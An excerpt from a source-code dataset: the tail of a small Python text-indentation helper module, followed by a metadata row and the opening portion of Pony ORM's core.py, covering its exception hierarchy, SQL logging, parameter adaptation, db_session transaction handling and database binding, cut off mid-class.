] | 4 | 2015-01-27T01:56:14.000Z | 2021-02-23T07:21:20.000Z | # -*- coding: UTF-8 -*-
#------------------------------------------------------------------------------
# file: line_functions.py
# License: LICENSE.TXT
# Author: Ioannis Tziakos
#
# Copyright (c) 2011, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
#!/usr/bin/env python
import re
#------------------------------------------------------------------------------
# Precompiled regexes
#------------------------------------------------------------------------------
indent_regex = re.compile(r'\s+')
#------------------------------------------------------------------------------
# Functions to manage indention
#------------------------------------------------------------------------------
def add_indent(lines, indent=4):
    """ Indent every non-empty line by the given number of spaces.

    Arguments
    ---------
    lines : list
        The list of strings to indent.

    indent : int
        The number of spaces to add.

    Returns
    -------
    lines : list
        The indented strings (lines).

    .. note:: Lines that contain only whitespace (or nothing) are kept as-is.

    """
    prefix = ' ' * indent
    return [line if not line.strip() else prefix + line for line in lines]
def remove_indent(lines):
    """ Strip all leading whitespace from each of the given lines. """
    stripped = []
    for line in lines:
        stripped.append(line.lstrip())
    return stripped
def get_indent(line):
    """ Return the leading-whitespace prefix of the line ('' when none). """
    match = re.match(r'\s+', line)
    return '' if match is None else match.group()
#------------------------------------------------------------------------------
# Functions to detect line type
#------------------------------------------------------------------------------
def is_empty(line):
    """ True when the line contains nothing but whitespace. """
    return len(line.strip()) == 0
#------------------------------------------------------------------------------
# Functions to adjust strings
#------------------------------------------------------------------------------
def fix_star(word):
    """ Escape every '*' so reST does not treat it as markup. """
    return '\\*'.join(word.split('*'))
def fix_backspace(word):
    """ Double every backslash so reST renders it literally. """
    return '\\\\'.join(word.split('\\'))
def replace_at(word, line, index):
    """ Overwrite part of ``line`` with ``word`` starting at ``index``.

    The text in line is replaced (not inserted) with the word. The
    replacement starts at the provided index. The result is clipped to
    the input length.

    Arguments
    ---------
    word : str
        The text to copy into the line.

    line : str
        The line where the copy takes place.

    index : int
        The index to start coping.

    Returns
    -------
    result : str
        line of text with the text replaced.

    """
    end = index + len(word)
    head, tail = line[:index], line[end:]
    return (head + word + tail)[:len(line)]
| 25.5 | 79 | 0.434524 |
b7c5bfa62a5872369c9d9a90100345866eb2b1b7 | 293,023 | py | Python | pony/orm/core.py | antlarr-suse/pony | f75afc222a9e49821752ca10fbca589234b56c31 | [
"Apache-2.0"
] | null | null | null | pony/orm/core.py | antlarr-suse/pony | f75afc222a9e49821752ca10fbca589234b56c31 | [
"Apache-2.0"
] | null | null | null | pony/orm/core.py | antlarr-suse/pony | f75afc222a9e49821752ca10fbca589234b56c31 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, print_function, division
from pony.py23compat import PY2, izip, imap, iteritems, itervalues, items_list, values_list, xrange, cmp, \
basestring, unicode, buffer, int_types, builtins, with_metaclass
import json, re, sys, types, datetime, logging, itertools, warnings, inspect
from operator import attrgetter, itemgetter
from itertools import chain, starmap, repeat
from time import time
from decimal import Decimal
from random import shuffle, randint, random
from threading import Lock, RLock, currentThread as current_thread, _MainThread
from contextlib import contextmanager
from collections import defaultdict
from hashlib import md5
from inspect import isgeneratorfunction
from functools import wraps
from pony.thirdparty.compiler import ast, parse
import pony
from pony import options
from pony.orm.decompiling import decompile
from pony.orm.ormtypes import LongStr, LongUnicode, numeric_types, RawSQL, normalize, Json, TrackedValue, QueryType
from pony.orm.asttranslation import ast2src, create_extractors, TranslationError
from pony.orm.dbapiprovider import (
DBAPIProvider, DBException, Warning, Error, InterfaceError, DatabaseError, DataError,
OperationalError, IntegrityError, InternalError, ProgrammingError, NotSupportedError
)
from pony import utils
from pony.utils import localbase, decorator, cut_traceback, cut_traceback_depth, throw, reraise, truncate_repr, \
get_lambda_args, pickle_ast, unpickle_ast, deprecated, import_module, parse_expr, is_ident, tostring, strjoin, \
between, concat, coalesce, HashableDict
__all__ = [
'pony',
'DBException', 'RowNotFound', 'MultipleRowsFound', 'TooManyRowsFound',
'Warning', 'Error', 'InterfaceError', 'DatabaseError', 'DataError', 'OperationalError',
'IntegrityError', 'InternalError', 'ProgrammingError', 'NotSupportedError',
'OrmError', 'ERDiagramError', 'DBSchemaError', 'MappingError', 'BindingError',
'TableDoesNotExist', 'TableIsNotEmpty', 'ConstraintError', 'CacheIndexError',
'ObjectNotFound', 'MultipleObjectsFoundError', 'TooManyObjectsFoundError', 'OperationWithDeletedObjectError',
'TransactionError', 'ConnectionClosedError', 'TransactionIntegrityError', 'IsolationError',
'CommitException', 'RollbackException', 'UnrepeatableReadError', 'OptimisticCheckError',
'UnresolvableCyclicDependency', 'UnexpectedError', 'DatabaseSessionIsOver',
'DatabaseContainsIncorrectValue', 'DatabaseContainsIncorrectEmptyValue',
'TranslationError', 'ExprEvalError', 'PermissionError',
'Database', 'sql_debug', 'set_sql_debug', 'sql_debugging', 'show',
'PrimaryKey', 'Required', 'Optional', 'Set', 'Discriminator',
'composite_key', 'composite_index',
'flush', 'commit', 'rollback', 'db_session', 'with_transaction',
'LongStr', 'LongUnicode', 'Json',
'select', 'left_join', 'get', 'exists', 'delete',
'count', 'sum', 'min', 'max', 'avg', 'group_concat', 'distinct',
'JOIN', 'desc', 'between', 'concat', 'coalesce', 'raw_sql',
'buffer', 'unicode',
'get_current_user', 'set_current_user', 'perm', 'has_perm',
'get_user_groups', 'get_user_roles', 'get_object_labels',
'user_groups_getter', 'user_roles_getter', 'obj_labels_getter'
]
suppress_debug_change = False
def sql_debug(value):
    # todo: make sql_debug deprecated
    # No-op while debug changes are suppressed (e.g. during test runs).
    if suppress_debug_change:
        return
    local.debug = value
def set_sql_debug(debug=True, show_values=None):
    # Update the thread-local debug flags unless changes are suppressed.
    if suppress_debug_change:
        return
    local.debug = debug
    local.show_values = show_values
orm_logger = logging.getLogger('pony.orm')
sql_logger = logging.getLogger('pony.orm.sql')
orm_log_level = logging.INFO
def has_handlers(logger):
    # Report whether `logger` or any of its ancestors has a handler attached.
    if not PY2:
        # Python 3 provides this check out of the box.
        return logger.hasHandlers()
    # Python 2 fallback: walk up the logger hierarchy manually,
    # stopping early when propagation is disabled.
    while logger:
        if logger.handlers:
            return True
        elif not logger.propagate:
            return False
        logger = logger.parent
    return False
def log_orm(msg):
    # Route ORM messages through logging when a handler is configured,
    # otherwise fall back to stdout.
    if not has_handlers(orm_logger):
        print(msg)
    else:
        orm_logger.log(orm_log_level, msg)
def log_sql(sql, arguments=None):
    # A list of argument tuples means executemany(); reflect that in the log.
    if type(arguments) is list:
        sql = 'EXECUTEMANY (%d)\n%s' % (len(arguments), sql)
    if has_handlers(sql_logger):
        # With real log handlers, append argument values only when
        # explicitly enabled via local.show_values.
        if local.show_values and arguments:
            sql = '%s\n%s' % (sql, format_arguments(arguments))
        sql_logger.log(orm_log_level, sql)
    else:
        # Console fallback: show values unless explicitly disabled
        # (show_values=None defaults to showing them here).
        if (local.show_values is None or local.show_values) and arguments:
            sql = '%s\n%s' % (sql, format_arguments(arguments))
        print(sql, end='\n\n')
def format_arguments(arguments):
    # A list holds one argument set per executemany() row; render each row
    # on its own line. Anything else is a single argument set.
    if type(arguments) is list:
        return '\n'.join(args2str(row) for row in arguments)
    return args2str(arguments)
def args2str(args):
    # Render one set of query arguments for logging: positional arguments
    # as "[...]", keyword arguments as "{...}" with sorted keys.
    if isinstance(args, (tuple, list)):
        reprs = (repr(arg) for arg in args)
        return '[%s]' % ', '.join(reprs)
    if isinstance(args, dict):
        pairs = ('%s:%s' % (repr(key), repr(value)) for key, value in sorted(args.items()))
        return '{%s}' % ', '.join(pairs)
    # Any other type is silently ignored (returns None), same as before.
adapted_sql_cache = {}
string2ast_cache = {}
# --- Root of the Pony ORM exception hierarchy -------------------------------
class OrmError(Exception): pass
# --- Schema / mapping definition errors --------------------------------------
class ERDiagramError(OrmError): pass
class DBSchemaError(OrmError): pass
class MappingError(OrmError): pass
class BindingError(OrmError): pass
class TableDoesNotExist(OrmError): pass
class TableIsNotEmpty(OrmError): pass
class ConstraintError(OrmError): pass
class CacheIndexError(OrmError): pass
# --- Raw-query result errors (Database.select/get) ---------------------------
class RowNotFound(OrmError): pass
class MultipleRowsFound(OrmError): pass
class TooManyRowsFound(OrmError): pass
class PermissionError(OrmError): pass
class ObjectNotFound(OrmError):
    # Raised when an entity lookup by primary key finds nothing.
    # Keeps the entity class and the primary key value for inspection.
    def __init__(exc, entity, pkval=None):
        if pkval is not None:
            if type(pkval) is tuple:
                # Composite keys are rendered as "Entity[a,b]".
                pkval = ','.join(imap(repr, pkval))
            else: pkval = repr(pkval)
            msg = '%s[%s]' % (entity.__name__, pkval)
        else: msg = entity.__name__
        OrmError.__init__(exc, msg)
        exc.entity = entity
        exc.pkval = pkval
class MultipleObjectsFoundError(OrmError): pass
class TooManyObjectsFoundError(OrmError): pass
class OperationWithDeletedObjectError(OrmError): pass
# --- Transaction-level errors -------------------------------------------------
class TransactionError(OrmError): pass
class ConnectionClosedError(TransactionError): pass
class TransactionIntegrityError(TransactionError):
    # Wraps a database integrity violation; the driver exception is
    # preserved in `original_exc`.
    def __init__(exc, msg, original_exc=None):
        Exception.__init__(exc, msg)
        exc.original_exc = original_exc
class CommitException(TransactionError):
    # Commit of the primary cache failed; `exceptions` is a list of
    # sys.exc_info() triples collected while committing/rolling back.
    def __init__(exc, msg, exceptions):
        Exception.__init__(exc, msg)
        exc.exceptions = exceptions
class PartialCommitException(TransactionError):
    # The primary cache committed, but one or more secondary caches failed.
    def __init__(exc, msg, exceptions):
        Exception.__init__(exc, msg)
        exc.exceptions = exceptions
class RollbackException(TransactionError):
    # One or more caches failed during rollback.
    def __init__(exc, msg, exceptions):
        Exception.__init__(exc, msg)
        exc.exceptions = exceptions
class DatabaseSessionIsOver(TransactionError): pass
# Backward-compatible alias for DatabaseSessionIsOver.
TransactionRolledBack = DatabaseSessionIsOver
class IsolationError(TransactionError): pass
class UnrepeatableReadError(IsolationError): pass
class OptimisticCheckError(IsolationError): pass
class UnresolvableCyclicDependency(TransactionError): pass
class UnexpectedError(TransactionError):
    # Unclassified error raised during flush/commit; the original
    # exception is preserved in `original_exc`.
    def __init__(exc, msg, original_exc):
        Exception.__init__(exc, msg)
        exc.original_exc = original_exc
class ExprEvalError(TranslationError):
    # Raised when evaluating an external (non-translatable) expression
    # inside a query fails; the triggering exception is kept in `cause`.
    def __init__(exc, src, cause):
        assert isinstance(cause, Exception)
        msg = '`%s` raises %s: %s' % (src, type(cause).__name__, str(cause))
        TranslationError.__init__(exc, msg)
        exc.cause = cause
class PonyInternalException(Exception):
    # Base for internal control-flow exceptions; never surfaces to user code.
    pass
class OptimizationFailed(PonyInternalException):
    pass # Internal exception, cannot be encountered in user code
class UseAnotherTranslator(PonyInternalException):
    # Internal signal telling the query machinery to switch to a
    # different translator instance.
    def __init__(self, translator):
        Exception.__init__(self, 'This exception should be catched internally by PonyORM')
        self.translator = translator
class DatabaseContainsIncorrectValue(RuntimeWarning):
    # Warning issued when a value fetched from the database does not fit
    # the declared attribute.
    pass
class DatabaseContainsIncorrectEmptyValue(DatabaseContainsIncorrectValue):
    # Same as above, specifically for unexpected empty/NULL values.
    pass
def adapt_sql(sql, paramstyle):
    # Convert raw SQL containing $-placeholders (e.g. "... WHERE id = $x")
    # into SQL using the DBAPI driver's paramstyle, plus a compiled code
    # object that evaluates the embedded Python expressions to produce the
    # query arguments. Results are memoized per (sql, paramstyle) pair.
    result = adapted_sql_cache.get((sql, paramstyle))
    if result is not None: return result
    pos = 0
    result = []
    args = []
    kwargs = {}
    original_sql = sql
    # '%' must be escaped for drivers that use %-based placeholder formats.
    if paramstyle in ('format', 'pyformat'): sql = sql.replace('%', '%%')
    while True:
        try: i = sql.index('$', pos)
        except ValueError:
            # No more placeholders: keep the remaining tail and stop.
            result.append(sql[pos:])
            break
        result.append(sql[pos:i])
        if sql[i+1] == '$':
            # '$$' is an escaped literal dollar sign.
            result.append('$')
            pos = i+2
        else:
            # Extract the Python expression that follows the '$'.
            try: expr, _ = parse_expr(sql, i+1)
            except ValueError:
                raise # TODO
            pos = i+1 + len(expr)
            if expr.endswith(';'): expr = expr[:-1]
            compile(expr, '<?>', 'eval') # expr correction check
            # Emit the placeholder in the driver's native paramstyle;
            # positional styles collect into `args`, named ones into `kwargs`.
            if paramstyle == 'qmark':
                args.append(expr)
                result.append('?')
            elif paramstyle == 'format':
                args.append(expr)
                result.append('%s')
            elif paramstyle == 'numeric':
                args.append(expr)
                result.append(':%d' % len(args))
            elif paramstyle == 'named':
                key = 'p%d' % (len(kwargs) + 1)
                kwargs[key] = expr
                result.append(':' + key)
            elif paramstyle == 'pyformat':
                key = 'p%d' % (len(kwargs) + 1)
                kwargs[key] = expr
                result.append('%%(%s)s' % key)
            else: throw(NotImplementedError)
    if args or kwargs:
        # Build a single expression that evaluates all extracted expressions
        # into a tuple (positional styles) or a dict (named styles).
        adapted_sql = ''.join(result)
        if args: source = '(%s,)' % ', '.join(args)
        else: source = '{%s}' % ','.join('%r:%s' % item for item in kwargs.items())
        code = compile(source, '<?>', 'eval')
    else:
        # No placeholders at all: just unescape '$$' back to '$'.
        adapted_sql = original_sql.replace('$$', '$')
        code = compile('None', '<?>', 'eval')
    result = adapted_sql, code
    adapted_sql_cache[(sql, paramstyle)] = result
    return result
class Local(localbase):
    # Thread-local state shared across the ORM: SQL debug flags, the mapping
    # from Database objects to their per-thread SessionCache, db_session
    # nesting depth, and the current-user / permission caches.
    def __init__(local):
        local.debug = False
        local.show_values = None
        local.debug_stack = []          # stack of saved (debug, show_values) pairs
        local.db2cache = {}             # Database -> SessionCache for this thread
        local.db_context_counter = 0    # db_session nesting depth
        local.db_session = None         # outermost active DBSessionContextManager
        local.current_user = None
        local.perms_context = None
        local.user_groups_cache = {}
        local.user_roles_cache = defaultdict(dict)
    def push_debug_state(local, debug, show_values):
        # Remember the current debug settings so they can be restored later.
        local.debug_stack.append((local.debug, local.show_values))
        if not suppress_debug_change:
            local.debug = debug
            local.show_values = show_values
    def pop_debug_state(local):
        # Restore the debug settings saved by the matching push_debug_state().
        local.debug, local.show_values = local.debug_stack.pop()
local = Local()
def _get_caches():
    # Active session caches ordered by (database priority, creation order),
    # highest priority first -- this defines commit/rollback order.
    def sort_key(cache):
        return cache.database.priority, cache.num
    return sorted(local.db2cache.values(), key=sort_key, reverse=True)
@cut_traceback
def flush():
    # Push pending changes of every active session cache to the database
    # (does not commit the transactions).
    for cache in _get_caches(): cache.flush()
def transact_reraise(exc_class, exceptions):
    # Re-raise the first of the collected exceptions wrapped into `exc_class`,
    # preserving the original traceback. `exceptions` is a list of
    # sys.exc_info() triples gathered during commit/rollback of the caches.
    cls, exc, tb = exceptions[0]
    new_exc = None
    try:
        msg = " ".join(tostring(arg) for arg in exc.args)
        if not issubclass(cls, TransactionError): msg = '%s: %s' % (cls.__name__, msg)
        new_exc = exc_class(msg, exceptions)
        new_exc.__cause__ = None  # suppress implicit exception chaining in the report
        reraise(exc_class, new_exc, tb)
    finally: del exceptions, exc, tb, new_exc  # break traceback reference cycles
def rollback_and_reraise(exc_info):
    # Roll back all active sessions, then re-raise the original exception.
    # If rollback() itself fails, that failure propagates from the finally
    # block instead of the original one.
    try:
        rollback()
    finally:
        reraise(*exc_info)
@cut_traceback
def commit():
    # Flush and commit all active session caches. The highest-priority cache
    # is committed first; if that fails, all remaining caches are rolled back
    # and a CommitException is raised. Failures in secondary commits are
    # collected into a PartialCommitException (the primary commit stands).
    caches = _get_caches()
    if not caches: return
    try:
        for cache in caches:
            cache.flush()
    except:
        # Any flush failure aborts everything before touching the database.
        rollback_and_reraise(sys.exc_info())
    primary_cache = caches[0]
    other_caches = caches[1:]
    exceptions = []
    try:
        primary_cache.commit()
    except:
        exceptions.append(sys.exc_info())
        for cache in other_caches:
            try: cache.rollback()
            except: exceptions.append(sys.exc_info())
        transact_reraise(CommitException, exceptions)
    else:
        for cache in other_caches:
            try: cache.commit()
            except: exceptions.append(sys.exc_info())
        if exceptions:
            transact_reraise(PartialCommitException, exceptions)
    finally:
        del exceptions  # break reference cycles with stored tracebacks
@cut_traceback
def rollback():
    # Roll back every active session cache; collect all failures and
    # re-raise them wrapped into a single RollbackException.
    exceptions = []
    try:
        for cache in _get_caches():
            try: cache.rollback()
            except: exceptions.append(sys.exc_info())
        if exceptions:
            transact_reraise(RollbackException, exceptions)
        assert not local.db2cache
    finally:
        del exceptions  # break reference cycles with stored tracebacks
select_re = re.compile(r'\s*select\b', re.IGNORECASE)
class DBSessionContextManager(object):
    """Delimits a database session; usable as ``with db_session:`` or as the
    ``@db_session(...)`` decorator (including generator/coroutine functions).

    Options control retries, DDL mode, isolation (serializable), strictness,
    optimistic checks and per-session SQL debugging.
    """
    __slots__ = 'retry', 'retry_exceptions', 'allowed_exceptions', \
                'immediate', 'ddl', 'serializable', 'strict', 'optimistic', \
                'sql_debug', 'show_values'
    def __init__(db_session, retry=0, immediate=False, ddl=False, serializable=False, strict=False, optimistic=True,
                 retry_exceptions=(TransactionError,), allowed_exceptions=(), sql_debug=None, show_values=None):
        # Fixed: was `retry is not 0` -- identity comparison with an int
        # literal relies on CPython small-int caching and triggers a
        # SyntaxWarning on modern interpreters.
        if retry != 0:
            if type(retry) is not int: throw(TypeError,
                "'retry' parameter of db_session must be of integer type. Got: %s" % type(retry))
            if retry < 0: throw(TypeError,
                "'retry' parameter of db_session must not be negative. Got: %d" % retry)
            if ddl: throw(TypeError, "'ddl' and 'retry' parameters of db_session cannot be used together")
        if not callable(allowed_exceptions) and not callable(retry_exceptions):
            for e in allowed_exceptions:
                if e in retry_exceptions: throw(TypeError,
                    'The same exception %s cannot be specified in both '
                    'allowed and retry exception lists simultaneously' % e.__name__)
        db_session.retry = retry
        db_session.ddl = ddl
        db_session.serializable = serializable
        # serializable/ddl/pessimistic sessions start their transaction immediately
        db_session.immediate = immediate or ddl or serializable or not optimistic
        db_session.strict = strict
        db_session.optimistic = optimistic and not serializable
        db_session.retry_exceptions = retry_exceptions
        db_session.allowed_exceptions = allowed_exceptions
        db_session.sql_debug = sql_debug
        db_session.show_values = show_values
    def __call__(db_session, *args, **kwargs):
        # Either build a re-configured manager (keyword args only) or act
        # as a decorator (single callable positional argument).
        if not args and not kwargs: return db_session
        if len(args) > 1: throw(TypeError,
            'Pass only keyword arguments to db_session or use db_session as decorator')
        if not args: return db_session.__class__(**kwargs)
        if kwargs: throw(TypeError,
            'Pass only keyword arguments to db_session or use db_session as decorator')
        func = args[0]
        if isgeneratorfunction(func) or hasattr(inspect, 'iscoroutinefunction') and inspect.iscoroutinefunction(func):
            return db_session._wrap_coroutine_or_generator_function(func)
        return db_session._wrap_function(func)
    def __enter__(db_session):
        # Fixed: was `retry is not 0` (see __init__).
        if db_session.retry != 0: throw(TypeError,
            "@db_session can accept 'retry' parameter only when used as decorator and not as context manager")
        db_session._enter()
    def _enter(db_session):
        # Register this session as the outermost one, or validate nesting.
        if local.db_session is None:
            assert not local.db_context_counter
            local.db_session = db_session
        elif db_session.ddl and not local.db_session.ddl: throw(TransactionError,
            'Cannot start ddl transaction inside non-ddl transaction')
        elif db_session.serializable and not local.db_session.serializable: throw(TransactionError,
            'Cannot start serializable transaction inside non-serializable transaction')
        local.db_context_counter += 1
        if db_session.sql_debug is not None:
            local.push_debug_state(db_session.sql_debug, db_session.show_values)
    def __exit__(db_session, exc_type=None, exc=None, tb=None):
        if db_session.sql_debug is not None:
            local.pop_debug_state()
        local.db_context_counter -= 1
        if local.db_context_counter: return  # still inside a nested session
        assert local.db_session is db_session
        try:
            # Decide whether the session may commit despite the exception.
            if exc_type is None: can_commit = True
            elif not callable(db_session.allowed_exceptions):
                can_commit = issubclass(exc_type, tuple(db_session.allowed_exceptions))
            else:
                assert exc is not None  # exc can be None in Python 2.6 even if exc_type is not None
                try: can_commit = db_session.allowed_exceptions(exc)
                except: rollback_and_reraise(sys.exc_info())
            if can_commit:
                commit()
                for cache in _get_caches(): cache.release()
                assert not local.db2cache
            else:
                try: rollback()
                except:
                    if exc_type is None: raise # if exc_type is not None it will be reraised outside of __exit__
        finally:
            del exc, tb  # break traceback reference cycles
            local.db_session = None
            local.user_groups_cache.clear()
            local.user_roles_cache.clear()
    def _wrap_function(db_session, func):
        # Wrap a plain function: each call runs inside its own session,
        # retried up to `retry` times on retryable exceptions.
        def new_func(func, *args, **kwargs):
            if db_session.ddl and local.db_context_counter:
                if isinstance(func, types.FunctionType): func = func.__name__ + '()'
                throw(TransactionError, '%s cannot be called inside of db_session' % func)
            if db_session.sql_debug is not None:
                local.push_debug_state(db_session.sql_debug, db_session.show_values)
            exc = tb = None
            try:
                for i in xrange(db_session.retry+1):
                    db_session._enter()
                    exc_type = exc = tb = None
                    try:
                        result = func(*args, **kwargs)
                        commit()
                        return result
                    except:
                        exc_type, exc, tb = sys.exc_info()
                        retry_exceptions = db_session.retry_exceptions
                        if not callable(retry_exceptions):
                            do_retry = issubclass(exc_type, tuple(retry_exceptions))
                        else:
                            assert exc is not None  # exc can be None in Python 2.6
                            do_retry = retry_exceptions(exc)
                        if not do_retry: raise
                    finally: db_session.__exit__(exc_type, exc, tb)
                # All retries exhausted: re-raise the last exception.
                reraise(exc_type, exc, tb)
            finally:
                del exc, tb
                if db_session.sql_debug is not None:
                    local.pop_debug_state()
        return decorator(new_func, func)
    def _wrap_coroutine_or_generator_function(db_session, gen_func):
        # Wrap a generator/coroutine function: the session is suspended at
        # every yield/await and re-activated when execution resumes.
        for option in ('ddl', 'retry', 'serializable'):
            if getattr(db_session, option, None): throw(TypeError,
                "db_session with `%s` option cannot be applied to generator function" % option)
        def interact(iterator, input=None, exc_info=None):
            # Resume the wrapped iterator with a value or an exception.
            if exc_info is None:
                return next(iterator) if input is None else iterator.send(input)
            if exc_info[0] is GeneratorExit:
                close = getattr(iterator, 'close', None)
                if close is not None: close()
                reraise(*exc_info)
            throw_ = getattr(iterator, 'throw', None)
            if throw_ is None: reraise(*exc_info)
            return throw_(*exc_info)
        @wraps(gen_func)
        def new_gen_func(*args, **kwargs):
            # Session caches are parked here while the generator is suspended.
            db2cache_copy = {}
            def wrapped_interact(iterator, input=None, exc_info=None):
                if local.db_session is not None: throw(TransactionError,
                    '@db_session-wrapped generator cannot be used inside another db_session')
                assert not local.db_context_counter and not local.db2cache
                local.db_context_counter = 1
                local.db_session = db_session
                local.db2cache.update(db2cache_copy)
                db2cache_copy.clear()
                if db_session.sql_debug is not None:
                    local.push_debug_state(db_session.sql_debug, db_session.show_values)
                try:
                    try:
                        output = interact(iterator, input, exc_info)
                    except StopIteration as e:
                        for cache in _get_caches():
                            if cache.modified or cache.in_transaction: throw(TransactionError,
                                'You need to manually commit() changes before exiting from the generator')
                        raise
                    for cache in _get_caches():
                        if cache.modified or cache.in_transaction: throw(TransactionError,
                            'You need to manually commit() changes before yielding from the generator')
                except:
                    rollback_and_reraise(sys.exc_info())
                else:
                    return output
                finally:
                    # Park the caches again and detach the session from the thread.
                    if db_session.sql_debug is not None:
                        local.pop_debug_state()
                    db2cache_copy.update(local.db2cache)
                    local.db2cache.clear()
                    local.db_context_counter = 0
                    local.db_session = None
            gen = gen_func(*args, **kwargs)
            iterator = gen.__await__() if hasattr(gen, '__await__') else iter(gen)
            output = wrapped_interact(iterator)
            try:
                while True:
                    try:
                        input = yield output
                    except:
                        output = wrapped_interact(iterator, exc_info=sys.exc_info())
                    else:
                        output = wrapped_interact(iterator, input)
            except StopIteration:
                return
        if hasattr(types, 'coroutine'):
            new_gen_func = types.coroutine(new_gen_func)
        return new_gen_func
db_session = DBSessionContextManager()
class SQLDebuggingContextManager(object):
    # Context manager / decorator that temporarily enables (or disables)
    # SQL logging; the previous settings are restored on exit.
    def __init__(self, debug=True, show_values=None):
        self.debug = debug
        self.show_values = show_values
    def __call__(self, *args, **kwargs):
        # A single callable argument means decorator usage; anything else
        # builds a re-configured manager.
        if not kwargs and len(args) == 1 and callable(args[0]):
            arg = args[0]
            if not isgeneratorfunction(arg):
                return self._wrap_function(arg)
            return self._wrap_generator_function(arg)
        return self.__class__(*args, **kwargs)
    def __enter__(self):
        local.push_debug_state(self.debug, self.show_values)
    def __exit__(self, exc_type=None, exc=None, tb=None):
        local.pop_debug_state()
    def _wrap_function(self, func):
        # Plain functions: enable debugging around each call.
        def new_func(func, *args, **kwargs):
            self.__enter__()
            try:
                return func(*args, **kwargs)
            finally:
                self.__exit__()
        return decorator(new_func, func)
    def _wrap_generator_function(self, gen_func):
        # Generators: debugging is switched on only while the generator
        # body is actually executing (between resume and yield).
        def interact(iterator, input=None, exc_info=None):
            # Resume the wrapped iterator with a value or an exception.
            if exc_info is None:
                return next(iterator) if input is None else iterator.send(input)
            if exc_info[0] is GeneratorExit:
                close = getattr(iterator, 'close', None)
                if close is not None: close()
                reraise(*exc_info)
            throw_ = getattr(iterator, 'throw', None)
            if throw_ is None: reraise(*exc_info)
            return throw_(*exc_info)
        def new_gen_func(gen_func, *args, **kwargs):
            def wrapped_interact(iterator, input=None, exc_info=None):
                self.__enter__()
                try:
                    return interact(iterator, input, exc_info)
                finally:
                    self.__exit__()
            gen = gen_func(*args, **kwargs)
            iterator = iter(gen)
            output = wrapped_interact(iterator)
            try:
                while True:
                    try:
                        input = yield output
                    except:
                        output = wrapped_interact(iterator, exc_info=sys.exc_info())
                    else:
                        output = wrapped_interact(iterator, input)
            except StopIteration:
                return
        return decorator(new_gen_func, gen_func)
sql_debugging = SQLDebuggingContextManager()
def throw_db_session_is_over(action, obj, attr=None):
    # Raise DatabaseSessionIsOver with a uniform message describing the
    # attempted post-session access (optionally naming the attribute).
    suffix = '.%s' % attr.name if attr else ''
    message = 'Cannot %s %s%s: the database session is over' % (action, safe_repr(obj), suffix)
    throw(DatabaseSessionIsOver, message)
def with_transaction(*args, **kwargs):
    # Deprecated alias kept for backward compatibility; delegates to db_session.
    deprecated(3, "@with_transaction decorator is deprecated, use @db_session decorator instead")
    return db_session(*args, **kwargs)
@decorator
def db_decorator(func, *args, **kwargs):
    # Run `func` inside a db_session; when pony.web is loaded, let HTTP
    # redirects pass through and turn "not found" errors into HTTP 404.
    web = sys.modules.get('pony.web')
    allowed_exceptions = [ web.HttpRedirect ] if web else []
    try:
        with db_session(allowed_exceptions=allowed_exceptions):
            return func(*args, **kwargs)
    except (ObjectNotFound, RowNotFound):
        if web: throw(web.Http404NotFound)
        raise
known_providers = ('sqlite', 'postgres', 'mysql', 'oracle')
class OnConnectDecorator(object):
    """Implements ``db.on_connect``: registers callbacks that run on every
    newly established connection, optionally restricted to one provider::

        @db.on_connect(provider='sqlite')
        def setup(db, connection): ...
    """
    @staticmethod
    def check_provider(provider):
        # Validate the optional provider name: must be a known provider string.
        if provider:
            if not isinstance(provider, basestring):
                throw(TypeError, "'provider' option should be type of 'string', got %r" % type(provider).__name__)
            if provider not in known_providers:
                throw(BindingError, 'Unknown provider %s' % provider)
    def __init__(self, database, provider):
        OnConnectDecorator.check_provider(provider)
        self.provider = provider
        self.database = database
    def __call__(self, func=None, provider=None):
        if isinstance(func, types.FunctionType):
            # Direct decorator usage: register the callback and return the
            # original function so its name is not shadowed (the old code
            # returned a new OnConnectDecorator instead).
            self.database._on_connect_funcs.append((func, provider or self.provider))
            return func
        # Bugfix: the positional argument may itself be a provider *name*;
        # the old code compared `func is basestring`, which is never true
        # for a string instance, so `db.on_connect('sqlite')` silently
        # dropped the provider restriction.
        if not provider and isinstance(func, basestring):
            provider = func
        OnConnectDecorator.check_provider(provider)
        return OnConnectDecorator(self.database, provider)
class Database(object):
    def __deepcopy__(self, memo):
        # A Database holds live resources (connection pool, schema);
        # deepcopy must return the very same object.
        return self  # Database cannot be cloned by deepcopy()
    @cut_traceback
    def __init__(self, *args, **kwargs):
        # argument 'self' cannot be named 'database', because 'database' can be in kwargs
        self.priority = 0
        self._insert_cache = {}
        # ER-diagram related stuff:
        self._translator_cache = {}
        self._constructed_sql_cache = {}
        self.entities = {}
        self.schema = None
        # Base Entity class for this database; user entities subclass it.
        self.Entity = type.__new__(EntityMeta, 'Entity', (Entity,), {})
        self.Entity._database_ = self
        # Statistics-related stuff:
        self._global_stats = {}
        self._global_stats_lock = RLock()
        self._dblocal = DbLocal()
        # on_connect decorator and the callbacks it registers:
        self.on_connect = OnConnectDecorator(self, None)
        self._on_connect_funcs = []
        self.provider = self.provider_name = None
        # Constructor arguments, if any, bind the database right away.
        if args or kwargs: self._bind(*args, **kwargs)
    def call_on_connect(database, con):
        # Run all registered on_connect callbacks applicable to the current
        # provider on a freshly established connection, then commit.
        for func, provider in database._on_connect_funcs:
            if not provider or provider == database.provider_name:
                func(database, con)
        con.commit()
    @cut_traceback
    def bind(self, *args, **kwargs):
        # Public wrapper around _bind(): attaches a provider to this Database.
        self._bind(*args, **kwargs)
    def _bind(self, *args, **kwargs):
        # argument 'self' cannot be named 'database', because 'database' can be in kwargs
        if self.provider is not None:
            throw(BindingError, 'Database object was already bound to %s provider' % self.provider.dialect)
        # The provider may be given positionally or as a keyword argument.
        if args: provider, args = args[0], args[1:]
        elif 'provider' not in kwargs: throw(TypeError, 'Database provider is not specified')
        else: provider = kwargs.pop('provider')
        if isinstance(provider, type) and issubclass(provider, DBAPIProvider):
            # A provider class may be passed directly instead of its name.
            provider_cls = provider
        else:
            if not isinstance(provider, basestring): throw(TypeError)
            if provider == 'pygresql': throw(TypeError,
                'Pony no longer supports PyGreSQL module. Please use psycopg2 instead.')
            self.provider_name = provider
            # Provider modules live in pony.orm.dbproviders.<name>.
            provider_module = import_module('pony.orm.dbproviders.' + provider)
            provider_cls = provider_module.provider_cls
        kwargs['pony_call_on_connect'] = self.call_on_connect
        self.provider = provider_cls(*args, **kwargs)
    @property
    def last_sql(database):
        # Text of the last SQL statement executed in the current thread.
        return database._dblocal.last_sql
    @property
    def local_stats(database):
